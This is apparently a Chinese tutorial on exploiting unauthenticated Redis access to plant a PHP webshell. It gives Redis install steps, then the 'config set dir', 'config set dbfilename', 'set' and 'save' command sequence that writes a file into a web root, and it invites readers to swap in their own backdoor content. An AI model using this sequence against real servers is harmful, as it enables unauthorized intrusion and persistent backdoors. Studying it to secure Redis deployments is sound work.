免责声明:本文仅做技术交流与学习.
目录
redis--->webshell
Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)
前提条件:
端口开放(6379)
目录结构清晰
windows上开启redis服务:
sql
windows:
redis-server.exe redis.windows.conf
redis-cli.exe -h 127.0.0.1 -p 6379Linux上创建&开启redis服务:
1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
2、解压编译
tar xzvf redis-2.8.17.tar.gz #解压安装包
cd redis-2.8.17 # 进入redis目录
make #编译
3、配置及启动
cd src/ #进入src目录
cp redis-server /usr/bin/
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd .. # 返回上一级目录
cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
操作:
1-连接靶机redis
2-写入webshell
sql
config set dir /www/wwwroot/IP
config set dbfilename test.php
set test "<?phpphpinfo();?>"
bgsave
save
目录,文件名自己改
写入内容自己改...
3-访问后门路径
--上线...